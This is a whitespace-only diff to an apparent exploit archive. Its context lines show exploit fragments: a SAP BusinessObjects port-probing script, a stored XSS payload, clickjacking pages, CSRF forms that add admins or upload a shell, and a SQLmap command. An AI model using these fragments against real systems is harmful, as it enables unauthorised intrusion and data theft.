+++ b/exploits/linux/webapps/49321.py
@@ -2,7 +2,7 @@
 # Date: 12/12/2020
 # Exploit Author: IHTeam
 # Full Write-up: https://www.ihteam.net/advisory/terramaster-tos-multiple-vulnerabilities/
-# Vendor Homepage: https://www.terra-master.com/
+# Vendor Homepage: https://www.terra-master.com/
 # Version: <= 4.2.06
 # Tested on: 4.1.30, 4.2.06
 
diff --git a/exploits/multiple/dos/10870.html b/exploits/multiple/dos/10870.html
index ac1063bf2..72e42ab99 100644
--- a/exploits/multiple/dos/10870.html
+++ b/exploits/multiple/dos/10870.html
@@ -30,9 +30,9 @@ Click on google (look the Status bar) and you'll be redirect on Yahoo<br><strong
 <br>
 <br>
 <br>
-                           <font style="font-family:arial;font-size:32px">Look Here<br>
-                   | <br>
-                  V
+                           <font style="font-family:arial;font-size:32px">Look Here<br>
+                   | <br>
+                  V
 
 <script>
 
diff --git a/exploits/multiple/remote/14386.html b/exploits/multiple/remote/14386.html
index 11a973a7e..2334e3ff4 100644
--- a/exploits/multiple/remote/14386.html
+++ b/exploits/multiple/remote/14386.html
@@ -8,7 +8,7 @@ Opera</font><font face="Calibri" size="6" color="#FF0000">
 <font face="Arial" size="2"><code class="xml plain">
 (V10.60)</code></font><font face="Calibri" size="6" color="#FF0000"><code class="xml plain">
 <b>Clickjacking</b></code></font></p>
-<p align="center"> </p>
+<p align="center"> </p>
 <div class="style1" id="open"
 style="position:absolute; width:2px; height:2px; background:#FFFFFF; border:1px; left: 2px; top: 2px;"
 onmouseover="document.location='http://www.Securitylab.ir/ClickJacking';">
@@ -32,8 +32,8 @@ style="position:absolute; width:2px; height:13px; background:#FFFFFF; border:1px
 onmouseover="document.location='http://www.Securitylab.ir/ClickJacking';">
 <p align="center">
 <font size="1" color="#FFFFFF">ClickJacking</font></div>
-<p align="center"> </p>
-<p align="center"> </p>
+<p align="center"> </p>
+<p align="center"> </p>
 <p align="center">Discovered by: Pouya Daneshmand (whh_iran[at]yahoo[dot]com)</p>
 <p align="center">http://Securitylab.ir/Advisory</p>
 </html>
\ No newline at end of file
diff --git a/exploits/multiple/remote/14387.html b/exploits/multiple/remote/14387.html
index 7508a177f..8602d02c7 100644
--- a/exploits/multiple/remote/14387.html
+++ b/exploits/multiple/remote/14387.html
@@ -8,7 +8,7 @@ Safari</font><font face="Calibri" size="6" color="#FF0000">
 <font face="Arial" size="2"><code class="xml plain">
 (V4.0.2)</code></font><font face="Calibri" size="6" color="#FF0000"><code class="xml plain">
 <b>Clickjacking</b></code></font></p>
-<p align="center"> </p>
+<p align="center"> </p>
 <div class="style1" id="open"
 style="position:absolute; width:2px; height:2px; background:#FFFFFF; border:1px; left: 2px; top: 2px;"
 onmouseover="document.location='http://www.Securitylab.ir/ClickJacking';">
@@ -33,8 +33,8 @@ onmouseover="document.location='http://www.Securitylab.ir/ClickJacking';">
 <p align="center">
 <p align="center">
 <font size="1" color="#FFFFFF">ClickJacking</font></div>
-<p align="center"> </p>
-<p align="center"> </p>
+<p align="center"> </p>
+<p align="center"> </p>
 <p align="center">Discovered by: Pouya Daneshmand (whh_iran[at]yahoo[dot]com)</p>
 <p align="center">http://Securitylab.ir/Advisory</p>
 </html>
\ No newline at end of file
diff --git a/exploits/multiple/remote/14388.html b/exploits/multiple/remote/14388.html
index 29e809b0d..b705573b1 100644
--- a/exploits/multiple/remote/14388.html
+++ b/exploits/multiple/remote/14388.html
@@ -7,7 +7,7 @@
 <font face="Arial" size="2"><code class="xml plain">
 (V9.0.0.6)</code></font><font face="Calibri" size="6" color="#FF0000"><code class="xml plain">
 <b>Clickjacking</b></code></font></p>
-<p align="center"> </p>
+<p align="center"> </p>
 <div class="style1" id="open"
 style="position:absolute; width:2px; height:2px; background:#FFFFFF; border:1px; left: 2px; top: 2px;"
 onmouseover="document.location='http://www.Securitylab.ir/ClickJacking';">
@@ -31,8 +31,8 @@ style="position:absolute; width:2px; height:13px; background:#FFFFFF; border:1px
 onmouseover="document.location='http://www.Securitylab.ir/ClickJacking';">
 <p align="center">
 <font size="1" color="#FFFFFF">ClickJacking</font></div>
-<p align="center"> </p>
-<p align="center"> </p>
+<p align="center"> </p>
+<p align="center"> </p>
 <p align="center">Discovered by: Pouya Daneshmand (whh_iran[at]yahoo[dot]com)</p>
 <p align="center">http://Securitylab.ir/Advisory</p>
 </html>
\ No newline at end of file
diff --git a/exploits/multiple/webapps/11527.html b/exploits/multiple/webapps/11527.html
index ecc1e2e82..d147ac1e1 100644
--- a/exploits/multiple/webapps/11527.html
+++ b/exploits/multiple/webapps/11527.html
@@ -11,9 +11,9 @@ Create Database:
 					<td><div id="dbname_error"></div></td>
 				</tr>
 				<tr>
-					<td> </td>
+					<td> </td>
 					<td><center><input type="submit" id="submit_dbname" value="Create Database" class="input-button" /></center></td>
-					<td> </td>
+					<td> </td>
 				</tr>
 			</table>
 		</div>
@@ -36,9 +36,9 @@ Add Redirect:
     			http://<span id="wwwtxt">(www.)?</span><select name="domain" onChange="EnableDisableRadio();">
       			    <option selected value=".*">** All Public Domains **</a>
                 	<option value="siteismi.com">sEc-r1z.com</option></select>  
-			    </select>/ <input name=path type=text size="20" id="urlpath">
-				 <br />redirects to&#8594; 
-				<input id="url" name="url" type="text" size="50">  
+			    </select>/ <input name=path type=text size="20" id="urlpath">
+				 <br />redirects to&#8594; 
+				<input id="url" name="url" type="text" size="50">  
  
                 <br />
 				<noscript>
@@ -66,7 +66,7 @@ Add Redirect:
 			</p>
 		</form></div>
  	<p class="description">
-	 	<strong>Note:</strong><br /><ul><li>Checking the <b>Wild Card Redirect</b> Box will redirect all files within a directory to the same filename in the redirected directory.</li><li> </li><li>You cannot use a Wild Card Redirect to redirect your main domain to a different directory on your site.</li></ul>
+	 	<strong>Note:</strong><br /><ul><li>Checking the <b>Wild Card Redirect</b> Box will redirect all files within a directory to the same filename in the redirected directory.</li><li> </li><li>You cannot use a Wild Card Redirect to redirect your main domain to a different directory on your site.</li></ul>
 		</p>
 	<!-- <br /> -->
 	<h2>Current Redirects</h2>
diff --git a/exploits/multiple/webapps/18431.txt b/exploits/multiple/webapps/18431.txt
index 412560431..130f27a68 100644
--- a/exploits/multiple/webapps/18431.txt
+++ b/exploits/multiple/webapps/18431.txt
@@ -6,15 +6,15 @@
 # Software: Ajax Upload
 # http://valums.com/ajax-upload/
 # Tested on: Linux
-  
+  
 [Comment]
 Agradezco a mis amigos: Hernan Jais, Alfonso Cuevas, Lisandro
 Lezaeta, Inyexion, Login-Root, KikoArg, Ricota, Truenex, _tty0, Big,
 Sunplace,Erick Jordan,Animacco ,yojota, Pablin77, SPEED, Knet,
 Cereal, Yago, Rash, MagnoBalt, El Rodrix,NetT0xic,Gusan0r,Lucas Apa,
 Maxi Soler, Darioxchx,r0dr1,Zer0-Zo0rg
-  
-  
+  
+  
 [Arbitrary File Upload]
 
 You can upload any file you want by bypasss extesion wing headers, if
diff --git a/exploits/multiple/webapps/43123.txt b/exploits/multiple/webapps/43123.txt
index ec5557d39..ac9a6afa5 100644
--- a/exploits/multiple/webapps/43123.txt
+++ b/exploits/multiple/webapps/43123.txt
@@ -1,18 +1,18 @@
-# Exploit Title: Logitech Media Server : HTML code injection and execution.
-# Shodan Dork: Search Logitech Media Server
-# Date: 11/03/2017
-# Exploit Author: Dewank Pant
-# Vendor Homepage: www.logitech.com
-# Version: 7.9.0
-# Tested on: Windows 10, Linux
-# CVE : Applied For.
- 
- 
- 
+# Exploit Title: Logitech Media Server : HTML code injection and execution.
+# Shodan Dork: Search Logitech Media Server
+# Date: 11/03/2017
+# Exploit Author: Dewank Pant
+# Vendor Homepage: www.logitech.com
+# Version: 7.9.0
+# Tested on: Windows 10, Linux
+# CVE : Applied For.
+ 
+ 
+ 
 POC:
- 
-1. Access and go to the Radio URL tab and add a new URL.
-2. Add script as the value of the field.
-3. Payload : <script> alert(1)</script>
-4. Script saved and gives an image msg with a javascript execution on image click.
-5. Therefore, Persistent XSS.
\ No newline at end of file
+ 
+1. Access and go to the Radio URL tab and add a new URL.
+2. Add script as the value of the field.
+3. Payload : <script> alert(1)</script>
+4. Script saved and gives an image msg with a javascript execution on image click.
+5. Therefore, Persistent XSS.
\ No newline at end of file
diff --git a/exploits/multiple/webapps/43404.py b/exploits/multiple/webapps/43404.py
index 234dba7d7..e2c32f382 100755
--- a/exploits/multiple/webapps/43404.py
+++ b/exploits/multiple/webapps/43404.py
@@ -19,8 +19,8 @@ import sys
 
 if len(sys.argv) != 4:
 
-   print "Usage: python sblpta.py http://path.faces targetIP targetPort"
-   sys.exit(1)
+   print "Usage: python sblpta.py http://path.faces targetIP targetPort"
+   sys.exit(1)
 
 url = sys.argv[1]
 targetIP = sys.argv[2]
@@ -33,15 +33,15 @@ gcontext = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
 
 try:
 
-   request = urllib2.Request(url, headers=headers)
-   page = urllib2.urlopen(request, context=gcontext)
-   print "[*] Connected to SAP Bussiness Object %s"  %url
+   request = urllib2.Request(url, headers=headers)
+   page = urllib2.urlopen(request, context=gcontext)
+   print "[*] Connected to SAP Bussiness Object %s"  %url
 
 except:
 
-   print "[-] Failed To connect to SAP Bussiness Object %s" %url
-   print "[*] SAP Bussiness Object Link example: http://domain:port/BZ/portal/95000047/InfoView/logon.faces"
-   sys.exit(2)
+   print "[-] Failed To connect to SAP Bussiness Object %s" %url
+   print "[*] SAP Bussiness Object Link example: http://domain:port/BZ/portal/95000047/InfoView/logon.faces"
+   sys.exit(2)
 
  
 resheaders = page.info()
@@ -50,50 +50,50 @@ content = page.readlines()
 
 for line in content:
 
-   if "com.sun.faces.VIEW" in line:
-      sfview = line.split("=")[4].split("\"")[1]
-      print "[*] Got java faces dynamic value"
+   if "com.sun.faces.VIEW" in line:
+      sfview = line.split("=")[4].split("\"")[1]
+      print "[*] Got java faces dynamic value"
 
-   else:
-      continue
+   else:
+      continue
 
 if not sfview:
 
-   print "[-] Failed to java faces dynamic value, are you sure you extracted the java faces form from the link ??"
-   sys.exit(3)
+   print "[-] Failed to java faces dynamic value, are you sure you extracted the java faces form from the link ??"
+   sys.exit(3)
 
 
 formdata = {"_id0:logon:CMS":targetHostIP,
-         "_id0:logon:USERNAME":"",
-         "_id0:logon:PASSWORD":"",
-         "com.sun.faces.VIEW":sfview,
-         "_id0":"_id0"
-         }
+         "_id0:logon:USERNAME":"",
+         "_id0:logon:PASSWORD":"",
+         "com.sun.faces.VIEW":sfview,
+         "_id0":"_id0"
+         }
 
  
 
 data_encode = urllib.urlencode(formdata)
-start =  datetime.now()
-print "[*] Testing Timing Attack %s" %start        
+start =  datetime.now()
+print "[*] Testing Timing Attack %s" %start        
 request = urllib2.Request(url,data_encode)
 request.add_header('Cookie', cookie)
-response  = urllib2.urlopen(request)
+response  = urllib2.urlopen(request)
 end = datetime.now()
 the_page = response.read()
 
 
 if "FWM" in the_page:
  
-   elapsedTime = end-start
-   if elapsedTime.total_seconds() >= 10:
+   elapsedTime = end-start
+   if elapsedTime.total_seconds() >= 10:
 
-      print "[*] Port %s is Open, Gotcha !!! " %targetPort
+      print "[*] Port %s is Open, Gotcha !!! " %targetPort
 
-   else:
+   else:
 
-      print "[*] Port %s is Closed , we die fast"  %targetPort
+      print "[*] Port %s is Closed , we die fast"  %targetPort
 
 elif "FWC" in the_page:
 
-   print "[-] error login expired"
-   sys.exit(10)
\ No newline at end of file
+   print "[-] error login expired"
+   sys.exit(10)
\ No newline at end of file
diff --git a/exploits/multiple/webapps/49372.txt b/exploits/multiple/webapps/49372.txt
index c474e2f4a..6d5fcb37c 100644
--- a/exploits/multiple/webapps/49372.txt
+++ b/exploits/multiple/webapps/49372.txt
@@ -7,8 +7,8 @@
 # Tested on: BackBox Linux
 # CVE : CVE-2021-3018
 
-Check the CMS version :goto www.site.com/cms/ and you will notice that in the login box there is the CMS name and its version 
-Check if it's vulnerable, goto ->: site.com/cms/print.php if the print.php exists, then try to find any valid ID which returns page to print  e.g: site.com/cms/print.php?id=1
+Check the CMS version :goto www.site.com/cms/ and you will notice that in the login box there is the CMS name and its version 
+Check if it's vulnerable, goto ->: site.com/cms/print.php if the print.php exists, then try to find any valid ID which returns page to print  e.g: site.com/cms/print.php?id=1
 Parameter: id (GET based)
 Use SQLmap if you've found the valid id...
 e.g: sqlmap -u "site.com/cms/print.php?id=1" --dbs
diff --git a/exploits/php/webapps/11127.txt b/exploits/php/webapps/11127.txt
index dd76f5190..c3403bd78 100644
--- a/exploits/php/webapps/11127.txt
+++ b/exploits/php/webapps/11127.txt
@@ -18,7 +18,7 @@
 <input type="password" name="newpass2" size="40" maxlength="20" /></td>
 <input type="radio" name="isadmin" value="1" onclick="Javascript:hesk_toggleLayerDisplay('options')" checked="checked" /> YES (access to all features and categories)</label><br />
 <input type="radio" name="isadmin" value="0" onclick="Javascript:hesk_toggleLayerDisplay('options')" /> NO (you can limit features and categories)</label>
-<input type="checkbox" name="categories[]" value="2" checked="checked" /> Support</label><br /><label><input type="checkbox" name="categories[]" value="3" /> Billing</label><br /><label><input type="checkbox" name="categories[]" value="4" /> Advertising</label><br /><label><input type="checkbox" name="categories[]" value="1" /> General</label><br />  
+<input type="checkbox" name="categories[]" value="2" checked="checked" /> Support</label><br /><label><input type="checkbox" name="categories[]" value="3" /> Billing</label><br /><label><input type="checkbox" name="categories[]" value="4" /> Advertising</label><br /><label><input type="checkbox" name="categories[]" value="1" /> General</label><br />  
 <input type="checkbox" name="features[]" value="can_view_tickets" checked="checked" />View tickets<sup>1</sup></label><br />
 <input type="checkbox" name="features[]" value="can_edit_tickets" />Edit ticket replies<sup>1</sup></label><br />
 <input type="checkbox" name="features[]" value="can_del_notes" />Delete any ticket notes<sup>1, 2</sup></label><br />
diff --git a/exploits/php/webapps/1140.php b/exploits/php/webapps/1140.php
index 61180fe4b..d90baf04a 100644
--- a/exploits/php/webapps/1140.php
+++ b/exploits/php/webapps/1140.php
@@ -73,7 +73,7 @@ $datai=dechex(ord($headeri[$ii]));
 if ($ji==16) {
              $ji=0;
              $ci++;
-             echo "<td>  </td>";
+             echo "<td>  </td>";
              for ($li=0; $li<=15; $li++)
                       { echo "<td>".$headeri[$li+$ki]."</td>";
 			    }
@@ -86,7 +86,7 @@ $ii++;
 $ji++;
 }
 for ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++)
-                      { echo "<td>  </td>";
+                      { echo "<td>  </td>";
                        }
 
 for ($li=$ci*16; $li<=strlen($headeri); $li++)
diff --git a/exploits/php/webapps/11593.txt b/exploits/php/webapps/11593.txt
index aa4daa5ce..01537183a 100644
--- a/exploits/php/webapps/11593.txt
+++ b/exploits/php/webapps/11593.txt
@@ -11,11 +11,11 @@
 #
 # if(empty($admin_name))
 # {
-# $errorMessage=warning." Username is empty!";
+# $errorMessage=warning." Username is empty!";
 # }
 # elseif(empty($admin_password))
 # {
-# $errorMessage=warning." Password is empty!";
+# $errorMessage=warning." Password is empty!";
 # }
 # 
 # 
diff --git a/exploits/php/webapps/11883.txt b/exploits/php/webapps/11883.txt
index f50cfabca..f13c461de 100644
--- a/exploits/php/webapps/11883.txt
+++ b/exploits/php/webapps/11883.txt
@@ -18,7 +18,7 @@ Contact Me : Eg[At]Hack[DoT]Cl
 
 <title>WebSiteBaker 2.8.1 DataBase Backup</title>
 
-  <p align="center"> </p>
+  <p align="center"> </p>
         <p align="center"><b><font size="5" color="#008000">WebSiteBaker 2.8.1
         DataBase </font></b><font size="5" color="#008000"><b>Backup</b></font></p>
         <p align="center"><font size="5" color="#FFFFFF"><b>By : Tr0y-x</b></font></p>
@@ -26,7 +26,7 @@ Contact Me : Eg[At]Hack[DoT]Cl
         <a href="http://WwW.SeC-WaR.CoM<http://www.sec-war.com/>" style="text-decoration: none">WwW[DoT]SeC-WaR[DoT]CoM</a></b></font></p>
         <p align="center"><font size="5" color="#FF6666"><b>Eg[At]Hack[Dot]Cl</b></font></p>
 
-        <p align="center"> </p>
+        <p align="center"> </p>
 
 <body bgcolor="#000000">
 
@@ -39,9 +39,9 @@ Contact Me : Eg[At]Hack[DoT]Cl
  <input type="submit" name="backup" value="Backup Database" />
         </font></p>
 </form>
-<p align="center"> </p>
+<p align="center"> </p>
 <p align="center"><b><font color="#FFFFFF">Greetz : Alnjm33 - Predator - xXx -
-Shooter  - Jamba - Jago-dz & All Sec-War.Com Members</font></b></p>
+Shooter  - Jamba - Jago-dz & All Sec-War.Com Members</font></b></p>
 <p align="center"><font color="#FFFFFF"><b>Specially To My Best Friend XR57</b></font></p>
 
 ::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
diff --git a/exploits/php/webapps/12031.html b/exploits/php/webapps/12031.html
index d3a3eee59..44ff68e0a 100644
--- a/exploits/php/webapps/12031.html
+++ b/exploits/php/webapps/12031.html
@@ -34,7 +34,7 @@ My home : Sec-war.com
         </thead>
         <tr vAlign="top">
             <td class="optiontitle" colSpan="2">
-            <p align="center"> </td>
+            <p align="center"> </td>
         </tr>
         <tbody id="tbody_bbtitle">
             <tr vAlign="top">
@@ -50,7 +50,7 @@ My home : Sec-war.com
             <tr vAlign="top">
                 <td class="optiontitle" colSpan="2">
                 <div>
-                    <p align="center"> </div>
+                    <p align="center"> </div>
                 </td>
             </tr>
         <tbody id="tbody_bbtitle">
@@ -59,13 +59,13 @@ My home : Sec-war.com
                 <p align="center">PASS must me*</td>
                 <td class="alt1" width="52%">
                 <p align="center">
-                <input class="bginput" dir="rtl" tabIndex="1" type="password" size="40" name="password" value="123456"><span lang="fr"> 
+                <input class="bginput" dir="rtl" tabIndex="1" type="password" size="40" name="password" value="123456"><span lang="fr"> 
                 </span></td>
             </tr>
             <tr vAlign="top">
                 <td class="optiontitle" colSpan="2">
                 <div>
-                    <p align="center"> </div>
+                    <p align="center"> </div>
                 </td>
             </tr>
         <tbody id="tbody_bbtitle">
@@ -76,12 +76,12 @@ My home : Sec-war.com
                 </td>
                 <td class="alt1" width="52%">
                 <p align="center">
-                <input class="bginput" dir="rtl" tabIndex="1" size="40" name="useremail" value="sec-war@demo.net"><span lang="fr"> 
+                <input class="bginput" dir="rtl" tabIndex="1" size="40" name="useremail" value="sec-war@demo.net"><span lang="fr"> 
                 </span></td>
             </tr>
             <tr vAlign="top">
                 <td class="optiontitle" colSpan="2">
-                 </td>
+                 </td>
             </tr>
         <tbody id="tbody_bbtitle">
             <tr vAlign="top">
@@ -97,12 +97,12 @@ My home : Sec-war.com
                 <option>--   --</option>
                 <option value="MA"> </option>
                 <option value="EG" selected></option>
-                </select> <span lang="fr">  </span></td>
+                </select> <span lang="fr">  </span></td>
             </tr>
             <tr vAlign="top">
                 <td class="optiontitle" colSpan="2">
                 <div>
-                    <p align="center"> </div>
+                    <p align="center"> </div>
                 </td>
             </tr>
         <tbody id="tbody_bbtitle">
@@ -119,12 +119,12 @@ My home : Sec-war.com
                 <option value="3"></option>
                 <option value="2"></option>
                 <option value="1"></option>
-                </select> <span lang="fr">  </span></td>
+                </select> <span lang="fr">  </span></td>
             </tr>
             <tbody id="tbody_bbtitle">
             <tr>
                 <td class="tfoot" align="middle" colSpan="2">
-                <input class="button" id="submit" type="submit" value="ok add  "> 
+                <input class="button" id="submit" type="submit" value="ok add  "> 
                 </td>
             </tr>
     </table>
diff --git a/exploits/php/webapps/12045.html b/exploits/php/webapps/12045.html
index d75920067..5132fd5eb 100644
--- a/exploits/php/webapps/12045.html
+++ b/exploits/php/webapps/12045.html
@@ -50,7 +50,7 @@ size="2" face="Tahoma">
 value="reset" name="B2" style="float: left"></p>
 </form>
 <p><br>
- </p>
+ </p>
 </center>
 </body>
 
diff --git a/exploits/php/webapps/12047.html b/exploits/php/webapps/12047.html
index 497a33d3a..0c9e4970e 100644
--- a/exploits/php/webapps/12047.html
+++ b/exploits/php/webapps/12047.html
@@ -58,7 +58,7 @@ size="2" face="Tahoma">
 value="reset" name="B2" style="float: left"></p>
 </form>
 <p><br>
- </p>
+ </p>
 </center>
 </body>
 
diff --git a/exploits/php/webapps/12049.html b/exploits/php/webapps/12049.html
index fe124d71e..0a50f28e6 100644
--- a/exploits/php/webapps/12049.html
+++ b/exploits/php/webapps/12049.html
@@ -39,7 +39,7 @@
   	or
   	</font>
   	<font face="Tahoma" size="2" color="#000000">http://victim</font><font 
-size="2" face="Tahoma"></a> <font size="2"> --></font></font></b><font 
+size="2" face="Tahoma"></a> <font size="2"> --></font></font></b><font 
 size="2" face="Tahoma">
   	<input type="text" name="victim" size="20";"></p>
 <center>
@@ -49,7 +49,7 @@ size="2" face="Tahoma">
 value="reset" name="B2" style="float: left"></p>
 </form>
 <p><br>
- </p>
+ </p>
 </center>
 </body>
 
diff --git a/exploits/php/webapps/12322.txt b/exploits/php/webapps/12322.txt
index 500405950..f538250c1 100644
--- a/exploits/php/webapps/12322.txt
+++ b/exploits/php/webapps/12322.txt
@@ -42,7 +42,7 @@
   <tr><td>MySQL login:</td><td><input type="text" name="databaselogin" value="" /></td></tr>
   <tr><td>MySQL password:</td><td><input type="text" name="databasepassword" value="" /></td></tr>
   <tr><td>MySQL host:</td><td><input type="text" name="databasehost" value="" /></td></tr>
-  <tr><td> </td><td><input type="submit" name="submit" value="Create Database" /></td></tr>
+  <tr><td> </td><td><input type="submit" name="submit" value="Create Database" /></td></tr>
   </table></form>
   </html>
 
diff --git a/exploits/php/webapps/12496.html b/exploits/php/webapps/12496.html
index de28999b3..afbbbab4d 100644
--- a/exploits/php/webapps/12496.html
+++ b/exploits/php/webapps/12496.html
@@ -13,8 +13,8 @@
  <form name="form1" method="post" action="http://[vuln_site]/kubeblog/adm/users_add.php">
         <table width="70%" cellpadding="0" cellspacing="2" border="0">
           <tr>
-            <td width="35%"> </td>
-            <td width="65%"> </td>
+            <td width="35%"> </td>
+            <td width="65%"> </td>
 
           </tr>
           <tr>
@@ -40,15 +40,15 @@
 
           </tr>
           <tr>
-            <td> </td>
-            <td> </td>
+            <td> </td>
+            <td> </td>
           </tr>
           <tr>
             <td></td>
             <td height="30" style="padding-left:6px;">
             <input name="Submit" type="submit" class="button" value="Submit">
 
-             
+             
             <input name="Reset" type="reset" class="button" value="Reset">
             </td>
           </tr>
diff --git a/exploits/php/webapps/12563.txt b/exploits/php/webapps/12563.txt
index 57952ea6e..75ccfda8c 100644
--- a/exploits/php/webapps/12563.txt
+++ b/exploits/php/webapps/12563.txt
@@ -57,7 +57,7 @@ _____________________________________________________________
 <input name="ok" type="submit" class="button" id="ok" value="OK">
 </p>
 <p align="center">(only gif png jpg are allowed) </p>
-<p align="center">Files go to:  http://example.pt/uploads/your_file.php.png</p>
+<p align="center">Files go to:  http://example.pt/uploads/your_file.php.png</p>
 </form>
 </html>
 
diff --git a/exploits/php/webapps/12857.txt b/exploits/php/webapps/12857.txt
index 49ee0385f..be9f7ee33 100644
--- a/exploits/php/webapps/12857.txt
+++ b/exploits/php/webapps/12857.txt
@@ -84,7 +84,7 @@ Example : http://[site]/[path]/admin/file_manager.php/login.php?action=download&
 
 FILE NAME:<br> 
 
-<input type="text" name="filename">  (ex. shell.php)<br>FILE CONTENTS:<br> 
+<input type="text" name="filename">  (ex. shell.php)<br>FILE CONTENTS:<br> 
 
 <textarea name="file_contents" wrap="soft" cols="70" rows="10"></textarea> 
 
diff --git a/exploits/php/webapps/1367.php b/exploits/php/webapps/1367.php
index 2d9839b50..6d763e89d 100644
--- a/exploits/php/webapps/1367.php
+++ b/exploits/php/webapps/1367.php
@@ -90,7 +90,7 @@ $datai=dechex(ord($headeri[$ii]));
 if ($ji==16) {
              $ji=0;
              $ci++;
-             echo "<td>  </td>";
+             echo "<td>  </td>";
              for ($li=0; $li<=15; $li++)
                       { echo "<td>".$headeri[$li+$ki]."</td>";
 			    }
@@ -103,7 +103,7 @@ $ii++;
 $ji++;
 }
 for ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++)
-                      { echo "<td>  </td>";
+                      { echo "<td>  </td>";
                        }
 
 for ($li=$ci*16; $li<=strlen($headeri); $li++)
diff --git a/exploits/php/webapps/13785.txt b/exploits/php/webapps/13785.txt
index e358079ec..17c08a195 100644
--- a/exploits/php/webapps/13785.txt
+++ b/exploits/php/webapps/13785.txt
@@ -1,23 +1,23 @@
-        =======================================
-          eLMS Pro SQLi and XSS Vulnerability
-        =======================================
+        =======================================
+          eLMS Pro SQLi and XSS Vulnerability
+        =======================================
 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
-0     _                   __           __       __                     1
-1   /' \            __  /'__`\        /\ \__  /'__`\                   0
-0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
-1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
-0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
-1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
-0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
-1                  \ \____/ >> Exploit database separated by exploit   0
-0                   \/___/          type (local, remote, DoS, etc.)    1
-1                                                                      1
-0  [+] Site            : Inj3ct0r.com                                  0
-1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1
-0                                                                      0
-1               ##########################################             1
-0               I'm Sid3^effects member from Inj3ct0r Team             1
-1               ##########################################             0
+0     _                   __           __       __                     1
+1   /' \            __  /'__`\        /\ \__  /'__`\                   0
+0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
+1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
+0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
+1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
+0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
+1                  \ \____/ >> Exploit database separated by exploit   0
+0                   \/___/          type (local, remote, DoS, etc.)    1
+1                                                                      1
+0  [+] Site            : Inj3ct0r.com                                  0
+1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1
+0                                                                      0
+1               ##########################################             1
+0               I'm Sid3^effects member from Inj3ct0r Team             1
+1               ##########################################             0
 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
 
 Name : eLMS Pro SQLi and XSS Vulnerability
@@ -49,14 +49,14 @@ smart calendar. IM communication is available for all 3 user levels.
 
 Xploit: SQLi Vulnerability
 
-DEMO  URL :http://[site]/subscribe.php?course_id=[sqli]
+DEMO  URL :http://[site]/subscribe.php?course_id=[sqli]
 
 ###############################################################################################################
 Xploit: XSS Vulnerability
 
-  Attack Pattern: '"-->
+  Attack Pattern: '"-->
 
-  http://[site]/subscribe.php?course_id=[XSS]
+  http://[site]/subscribe.php?course_id=[XSS]
 
 
 ###############################################################################################################
diff --git a/exploits/php/webapps/13786.txt b/exploits/php/webapps/13786.txt
index 291cc2d48..0882a1da0 100644
--- a/exploits/php/webapps/13786.txt
+++ b/exploits/php/webapps/13786.txt
@@ -1,23 +1,23 @@
-        =======================================
-          PGAUTOPro SQLi and XSS Vulnerability
-        =======================================
+        =======================================
+          PGAUTOPro SQLi and XSS Vulnerability
+        =======================================
 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
-0     _                   __           __       __                     1
-1   /' \            __  /'__`\        /\ \__  /'__`\                   0
-0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
-1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
-0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
-1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
-0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
-1                  \ \____/ >> Exploit database separated by exploit   0
-0                   \/___/          type (local, remote, DoS, etc.)    1
-1                                                                      1
-0  [+] Site            : Inj3ct0r.com                                  0
-1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1
-0                                                                      0
-1               ##########################################             1
-0               I'm Sid3^effects member from Inj3ct0r Team             1
-1               ##########################################             0
+0     _                   __           __       __                     1
+1   /' \            __  /'__`\        /\ \__  /'__`\                   0
+0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
+1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
+0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
+1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
+0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
+1                  \ \____/ >> Exploit database separated by exploit   0
+0                   \/___/          type (local, remote, DoS, etc.)    1
+1                                                                      1
+0  [+] Site            : Inj3ct0r.com                                  0
+1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1
+0                                                                      0
+1               ##########################################             1
+0               I'm Sid3^effects member from Inj3ct0r Team             1
+1               ##########################################             0
